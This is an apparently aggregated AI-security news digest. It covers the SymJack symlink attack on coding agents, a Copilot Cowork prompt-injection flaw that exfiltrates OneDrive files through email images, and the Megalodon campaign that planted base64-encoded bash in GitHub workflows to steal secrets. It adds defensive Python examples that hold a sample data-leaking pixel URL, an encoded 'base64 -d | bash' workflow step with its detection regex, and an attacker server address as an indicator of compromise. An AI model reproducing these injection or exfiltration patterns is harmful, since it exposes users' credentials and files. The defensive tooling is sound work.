New tools, products, platforms, funding rounds, and company developments in AI security.
RevEng.AI, a cybersecurity startup, raised $15 million to develop an AI tool called BinNet that analyzes compiled software binaries (the machine-readable code that actually runs on computers) to find vulnerabilities and backdoors without needing the original source code. The technology aims to secure the software supply chain by verifying what software actually does before it's deployed, which is increasingly important as AI systems are used to write code automatically.
Cisco partnered with OpenAI to integrate Codex (an AI code generation tool) directly into their enterprise software engineering workflows, treating it as an AI teammate rather than just a developer productivity tool. By using Codex in production environments, Cisco accelerated development on products like AI Defense (a security solution protecting against AI-related risks), compressing work that normally takes quarters into just weeks, while also automating large-scale defect repairs and build optimization across interconnected code repositories.
SymJack is an attack that exploits AI coding agents by tricking them into inserting malicious code into software projects through disguised symlinks (shortcuts that point to files). The attacker controls a code repository and hides malicious instructions in an innocent-looking file request, which the AI agent approves and executes without the developer realizing what's happening, potentially stealing credentials or compromising production systems.
An analysis suggests that parts of Pope Leo XIV's encyclical (a formal letter from the Pope) about AI's dangers may have been written by AI itself, with some sections scoring 40-100% AI-generated according to Pangram, an AI detection tool. The document shows linguistic patterns common in AI writing, such as unusual word frequency that matches Claude, an AI made by Anthropic.
Warp, a modern terminal application, is using GPT-5.5 to power AI agents (software programs that can autonomously plan and execute tasks) that help write code and manage open-source development. In Warp's internal testing, GPT-5.5 uses 30% fewer tokens (units of text that the AI processes) per coding task than GPT-5.4, making the system more efficient as it scales to handle longer, more complex workflows.
Pope Leo XIV released an encyclical (a formal church letter) warning that artificial intelligence could displace workers, increase inequality, and remove humans from lethal weapons decisions, but Trump administration officials disagreed on how to respond. Interior Secretary Doug Burgum dismissed the pope's concerns as outside his role, while Vice President JD Vance praised the message as important moral leadership, highlighting a split in the administration over whether AI should face stronger oversight or remain deregulated for competitive advantage.
Microsoft Copilot Cowork had a security flaw where its agents (automated systems that perform tasks) could send emails to users without approval, and these emails could contain external images that leak data when opened. An attacker could use prompt injection (tricking the AI by hiding instructions in its input) to make the agent create download links to files on OneDrive, allowing the attacker to steal those files.
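The leak described above works because a mail client fetches remote images as soon as the message is opened, so any data the agent was tricked into placing in an image URL leaves the tenant without a click. As an added example (not Microsoft's Copilot Cowork code), the following Python scans agent-generated email HTML before it is sent, classifies each image source, and blanks the ones that would trigger a remote load. The allowlist of company asset hosts and the sample email body are constructed for the demo.

```python
"""Added example (not Microsoft's Copilot Cowork code): inspect agent-generated
email HTML for remote image loads before it is sent, and neutralise them."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Image sources that load nothing from the network when the mail is opened.
INLINE_SCHEMES = {"cid", "data"}


class _ImgCollector(HTMLParser):
    """Collect every <img src=...> value in document order."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def classify_image_sources(html, allowed_hosts=()):
    """Return one finding per image: inline, allowed-host, or external.

    `allowed_hosts` is an assumed allowlist of the organisation's own asset hosts.
    Anything else that would trigger a network request on open is 'external';
    the query length is reported because exfiltration via images usually hides
    the stolen data in the URL.
    """
    parser = _ImgCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        parts = urlsplit(src)
        if parts.scheme in INLINE_SCHEMES:
            verdict = "inline"
        elif parts.hostname and parts.hostname in allowed_hosts:
            verdict = "allowed-host"
        else:
            verdict = "external"
        findings.append({"src": src, "verdict": verdict, "query_len": len(parts.query)})
    return findings


def strip_external_images(html, allowed_hosts=()):
    """Replace every external image src so opening the mail makes no remote request."""
    out = html
    for f in classify_image_sources(html, allowed_hosts):
        if f["verdict"] == "external":
            out = out.replace(f["src"], "blocked:external-image", 1)
    return out


# Constructed email body as an agent might produce it: a CID-embedded logo,
# a banner from the company's own CDN, and a 1x1 pixel whose URL carries data.
SAMPLE_EMAIL = (
    "<p>Your summary is attached.</p>"
    '<img src="cid:logo@example-corp" alt="logo">'
    '<img src="https://cdn.example-corp.com/banner.png" alt="banner">'
    '<img src="https://tracker.invalid/p.gif?d=CONSTRUCTED_TOKEN_VALUE" width="1" height="1">'
)
COMPANY_HOSTS = ("cdn.example-corp.com",)

if __name__ == "__main__":
    for f in classify_image_sources(SAMPLE_EMAIL, COMPANY_HOSTS):
        print(f)
    print(strip_external_images(SAMPLE_EMAIL, COMPANY_HOSTS))
```

Run it as a pre-send hook on anything an agent composes on a user's behalf; a long query string on an external pixel is the signal worth alerting on, since legitimate tracking pixels rarely carry more than a short identifier.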
Many organizations want to adopt agentic AI (AI systems that can independently execute complete workflows with minimal human input), but 76% say their current operations cannot support this change. The problem is that most companies are simply adding AI agents onto existing human-centered business models rather than fundamentally redesigning their operations, technology, workflows, and decision-making systems to work with AI as an integrated part of the organization.
The Megalodon campaign used compromised credentials to inject malicious commits into over 5,500 GitHub repositories, modifying GitHub Actions workflows (automation tools that run code tasks) to steal sensitive secrets like cloud credentials and SSH keys (authentication files). The attack hid malicious code in base64-encoded bash payloads (encoded script commands) and used fake author names like "build-bot" to disguise itself as routine maintenance, with researchers detecting unexpected workflow runs as a warning sign.
Google CEO Sundar Pichai discusses major AI changes coming to Google Search and YouTube, including new Gemini models (advanced AI systems for generating text and understanding information) and AI agents that can perform tasks rather than just deliver search results. These changes will likely reduce traffic to websites from Google Search, a phenomenon the interviewer calls 'Google Zero,' forcing publishers and content creators to adapt their business strategies.
Check Point launched a proactive Frontier AI Models Readiness Program to protect their products against threats from increasingly capable AI systems that could help attackers find and exploit vulnerabilities. The program involved scanning their code with AI tools, reviewing security, strengthening weak components, and speeding up their ability to create and release security patches.
Shadow AI refers to unapproved AI tools that employees use without IT oversight, often gaining access to company data through OAuth (a login system that grants third-party apps permission to access accounts) or browser sessions. Most organizations lack visibility into these tools and don't have governance policies in place, creating a security risk. The article describes a five-step program to manage shadow AI by discovering which tools are in use, creating practical policies, and establishing approved alternatives.
Fix: The source explicitly recommends five steps: (1) Discover shadow AI tools through auditing OAuth connections, scanning browser extensions, identifying AI features in already-approved tools, and conducting employee surveys. (2) Write an AI governance policy that lists approved tools, defines clear data classification rules (specifying which data like customer records and source code should never enter AI tools), confirms data training opt-out status for each tool, and establishes a defined process for requesting new tools. (3-5) The text cuts off before fully detailing steps 3-5, so no additional mitigations are explicitly stated in the provided content.
The Hacker News
Fix: Anthropic hardened Claude Code to resolve symlinks (determine where shortcuts actually point) before asking for approval, and to display the real destination path in the approval prompt shown to the user. The source notes that encouraging users to pause and consider before acting on automation requests could help stop SymJack attacks, and that the change would be simple for other coding agents to implement.
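The mitigation above is small enough to show end to end. This added Python example (not Anthropic's Claude Code implementation) resolves every symlink in a requested write path, checks whether the real destination still lies under the project root, and builds an approval prompt that always shows the resolved path when it differs from what the agent presented. The temporary repository, the `config.json` symlink and the outside `credentials.txt` target are constructed for the demo.

```python
"""Added example (not Anthropic's Claude Code implementation): resolve symlinks
before asking a user to approve a file write, and show the real destination."""
import tempfile
from pathlib import Path


def resolve_write_target(project_root: str, requested: str) -> dict:
    """Describe where a requested write really lands.

    `requested` is the project-relative path an agent asks to modify. Every
    symlink in it is resolved with Path.resolve(), so a link that points at a
    file outside the checkout is reported instead of silently followed.
    """
    root = Path(project_root).resolve()
    lexical = root / requested            # the path the agent showed the user
    real = lexical.resolve(strict=False)  # where bytes would actually be written
    try:
        real.relative_to(root)            # raises ValueError if real escapes root
        inside = True
    except ValueError:
        inside = False
    return {
        "requested": str(lexical),
        "real": str(real),
        "redirected": real != lexical,    # a symlink or '..' changed the destination
        "inside_project": inside,
    }


def approval_prompt(info: dict) -> str:
    """Prompt text that always carries the resolved path when it differs."""
    if not info["redirected"]:
        return f"Write to {info['requested']}? [y/N]"
    where = "INSIDE project" if info["inside_project"] else "OUTSIDE project root"
    return (f"Write to {info['requested']}\n"
            f"  resolves to: {info['real']}  ({where})\n"
            f"Proceed? [y/N]")


def demo() -> dict:
    """Constructed scenario: a checkout whose 'config.json' is a symlink to a
    file outside the repository, next to an ordinary source file."""
    with tempfile.TemporaryDirectory() as tmp:
        repo = Path(tmp) / "repo"
        (repo / "src").mkdir(parents=True)
        (repo / "src" / "main.py").write_text("print('hi')\n")
        outside = Path(tmp) / "home" / "user"
        outside.mkdir(parents=True)
        (repo / "config.json").symlink_to(outside / "credentials.txt")
        return {
            "benign": resolve_write_target(str(repo), "src/main.py"),
            "symlinked": resolve_write_target(str(repo), "config.json"),
        }


if __name__ == "__main__":
    for name, info in demo().items():
        print(f"--- {name} ---")
        print(approval_prompt(info))
```

The containment check is deliberately separate from the display: even a user who approves quickly sees the resolved path, and a policy layer can refuse any write whose `inside_project` is false without consulting the user at all.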
SecurityWeek
Advanced AI models like Claude Mythos are becoming autonomous cyber-attack tools that can identify vulnerabilities, chain multiple exploits together, and conduct multi-stage attacks with minimal human input, fundamentally changing how cyber offense and defense operate. Major tech companies have formed a defensive coalition (Project Glasswing) to respond to this emerging threat, signaling that AI-powered cyber operations have moved beyond experimentation into real operational capability. This represents a shift in cyber doctrine where speed, scale, and autonomy (the ability of AI to act without human direction) have become the defining factors in cyber conflict.
Data security posture management (DSPM, tools that help find sensitive data scattered across systems) helps security teams locate hidden data across cloud and on-premises environments to reduce data loss risk. Shadow data (data stored outside official IT oversight) can come from forgotten repositories, cloud containers, or unauthorized AI usage, making it difficult to track and protect. DSPM tools work alongside broader cloud security tools to discover both known and unknown data and manage exposure risks, with the market consolidating through major acquisitions by companies like Palo Alto Networks, IBM, and Varonis.
Tax AI is a system built by OpenAI and Thrive Holdings that uses Codex (a code-generating AI model) to automate tax return preparation for accounting firms, and it improves itself automatically rather than waiting for engineers to manually fix problems. The system learns from real-world use by collecting practitioner feedback, tracking how returns are processed (production traces, or a structured record of inputs and outputs), and using tailored evaluations to continuously refine itself. Within six weeks of launch, the system improved from only 25% of returns being correct enough to need minimal fixes to 86% reaching that standard.
Fix: The source describes the infrastructure that enables self-improvement but does not prescribe a specific fix or mitigation for any problem; no version update, patch, or explicit remediation step is mentioned. N/A.
OpenAI Blog
Anthropic released two new security features for Claude: a self-hosted sandbox that lets Claude Managed Agents (AI systems that can perform tasks autonomously) run code in user-controlled environments like their own servers or managed providers, and a security guidance plugin for Claude Code that scans for vulnerabilities (weaknesses that attackers could exploit) as developers write code. The plugin has reduced security issues by 30-40% in internal testing by catching problems before formal code review.
Fix: Anthropic provides two explicit mitigations: (1) Deploy the Claude sandbox by configuring Claude Managed Agents to execute tools in a user-controlled environment, applying your own network policies, audit logging, and security tooling while keeping files and repositories within your perimeter; (2) Use the security guidance plugin for Claude Code, available through the official Anthropic marketplace, which scans for vulnerabilities during file edits, after AI-generated changes, and at commit time to catch issues before full code review.
SecurityWeek
Microsoft is previewing automatic device isolation in Defender for Endpoint, a feature that uses AI to quickly disconnect compromised devices from the network while keeping them connected to security services, helping contain attacks that move at machine speed. However, a SANS Institute research paper warns that attackers could potentially exploit this feature to disable user accounts if it is not properly configured and tuned. Security experts emphasize that autonomous AI action tools like this must be carefully configured and tested, similar to any other automation capability.
Champion ethical hacker Valentina Palmiotti warns that powerful AI tools like Claude Mythos (an AI model that can find vulnerabilities, or security weaknesses, in software) could soon make human hackers like her unable to compete in bug bounty competitions (where hackers earn money by finding security flaws before criminals do). While she currently uses AI tools like Claude Code to work faster and win prizes at the Pwn2Own hacking competition, she believes advanced AI models will eventually take over most of the easier hacking tasks, leaving only the very best human hackers with opportunities to find new bugs.
Companies need strategies for using agentic AI (AI systems that can plan and execute multi-step tasks independently), but security tools to safely deploy these systems are still being developed. The main obstacle preventing wider adoption is the lack of proven security solutions to protect enterprises from risks that agentic AI introduces.
Fix: SafeDep recommended checking the GitHub Actions tab of each repository for unexpected workflow_dispatch runs (manual workflow triggers), and, if OIDC federation (a cloud authentication method) is used for deployments, reviewing cloud audit logs for token requests from unknown workflow runs. The researchers also shared a list of indicators of compromise (IOCs), including the attacker's command-and-control server address (216.126.225.129:8443), campaign signatures, forged author names and emails, commit messages, and names of compromised repositories to aid in detection and cleanup.
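Both warning signs from the Megalodon write-up, unexpected workflow_dispatch runs and base64-encoded bash steps hidden in routine-looking workflows, can be checked mechanically. The Python below is an added example, not SafeDep's tooling: `flag_runs` triages workflow-run records in the shape of the GitHub REST API's "list workflow runs" response, and `find_encoded_shell` decodes any `echo <base64> | base64 -d | bash` step so an analyst sees what it would execute. The `trusted_actors` allowlist and the `forged_names` set are assumptions standing in for an organisation's own dispatch policy and the researchers' IOC list ("build-bot" is the example name the page gives); the run records and workflow text are constructed.

```python
"""Added example (not SafeDep's tooling): triage GitHub Actions workflow runs and
workflow files for the signals described in the Megalodon write-up."""
import base64
import re

# Constructed records in the shape of the GitHub REST API's "list workflow runs" response.
SAMPLE_RUNS = [
    {"id": 101, "event": "push", "actor": {"login": "alice"},
     "head_commit": {"author": {"name": "alice", "email": "alice@example.com"}}},
    {"id": 102, "event": "workflow_dispatch", "actor": {"login": "alice"},
     "head_commit": {"author": {"name": "alice", "email": "alice@example.com"}}},
    {"id": 103, "event": "workflow_dispatch", "actor": {"login": "unknown-user"},
     "head_commit": {"author": {"name": "build-bot", "email": "build-bot@example.invalid"}}},
]

# Constructed workflow: a routine job whose last step decodes and runs a base64 blob.
DEMO_PAYLOAD = base64.b64encode(b'echo "decoded demo payload"').decode()
SAMPLE_WORKFLOW = f"""name: ci
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm test
      - run: echo "{DEMO_PAYLOAD}" | base64 -d | bash
"""

# echo "<base64>" | base64 -d | bash   (also matches --decode and sh)
ENCODED_EXEC = re.compile(
    r"""echo\s+["']?([A-Za-z0-9+/=]{16,})["']?\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"""
)


def flag_runs(runs, trusted_actors, forged_names):
    """Return [{'id', 'reasons'}] for runs that match the report's warning signs."""
    findings = []
    for run in runs:
        reasons = []
        actor = run.get("actor", {}).get("login")
        if run.get("event") == "workflow_dispatch" and actor not in trusted_actors:
            reasons.append(f"workflow_dispatch by untrusted actor {actor!r}")
        author = run.get("head_commit", {}).get("author", {}).get("name")
        if author in forged_names:
            reasons.append(f"commit author matches forged name {author!r}")
        if reasons:
            findings.append({"id": run["id"], "reasons": reasons})
    return findings


def find_encoded_shell(workflow_text):
    """Decode every encoded-shell step and report its line so the analyst sees what runs."""
    results = []
    for m in ENCODED_EXEC.finditer(workflow_text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded = "<not valid base64>"
        line = workflow_text[:m.start()].count("\n") + 1
        results.append({"line": line, "decoded": decoded})
    return results


if __name__ == "__main__":
    print(flag_runs(SAMPLE_RUNS, trusted_actors={"alice"}, forged_names={"build-bot"}))
    print(find_encoded_shell(SAMPLE_WORKFLOW))
```

In practice the run records come from the API for every repository in the organisation, and the workflow scan is run over `.github/workflows/*.yml` at the commit the suspicious run used, not at HEAD, since the campaign's commits may already have been reverted by the time the alert is triaged.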
CSO Online
Varonis Atlas has integrated with the Claude Compliance API to help organizations monitor and secure their use of Claude Enterprise and Claude Platform, which are AI tools used for tasks like document analysis and building custom applications. The integration allows security teams to track AI usage, detect misuse and sensitive data exposure, investigate complete chat sessions, and test for vulnerabilities like prompt injection (tricking an AI by hiding instructions in its input) and jailbreaks. Varonis Atlas connects AI activity to underlying data permissions and access controls to help organizations understand what data their AI systems can reach and whether that access is safe.
Fix: The source does not explicitly describe a specific fix or mitigation for a particular vulnerability. Instead, it describes Varonis Atlas's features for monitoring and securing AI systems: continuous monitoring of conversation content, real-time detection of sensitive data exposure and jailbreak attempts, session-level investigations, runtime guardrails, and proactive pen testing (stress-testing assistants and agents for vulnerabilities). Organizations can access these capabilities through the Varonis Atlas platform, including its AI inventory, posture management, security testing, runtime guardrails, and compliance reporting functionality.
BleepingComputer